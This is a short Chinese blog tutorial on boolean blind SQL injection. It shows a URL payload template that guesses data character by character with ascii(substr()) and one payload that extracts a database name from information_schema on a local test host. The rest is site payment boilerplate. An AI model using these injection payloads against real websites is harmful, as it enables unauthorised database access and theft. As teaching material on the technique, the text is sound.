SQL注入--盲注入(bool型)

本文介绍了如何利用盲注入(bool型)在无明显反馈的情况下,通过ASCII码猜测来获取数据库名、表名及字段内容的详细步骤。通过示例URL展示了如何构造SQL注入语句,并给出了Python脚本进行自动化盲注入的示例。
摘要由CSDN通过智能技术生成

一个带GET参数的网站,但是网页中没有返回任何查询结果和报错信息,只返回对和错:




盲注入格式:

http://127.0.0.1/index.php?id=1' and ascii(substr(
(SQL语句),1,1
))=ASCII%23

注:

SQL语句 输入SQL注入语句;

ASCII 返回的字符的ASCII码;

1 第一个字母,从1开始算起;

ASCII码可以根据二分法猜测;

详情可以了解sql的substr()语法;


爆库名(sql)的第1个字母:
http://127.0.0.1/index.php?id=1' and ascii(substr(
(select schema_name from information_schema.schemata limit 4,1),1,1
))=115%23

注:

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值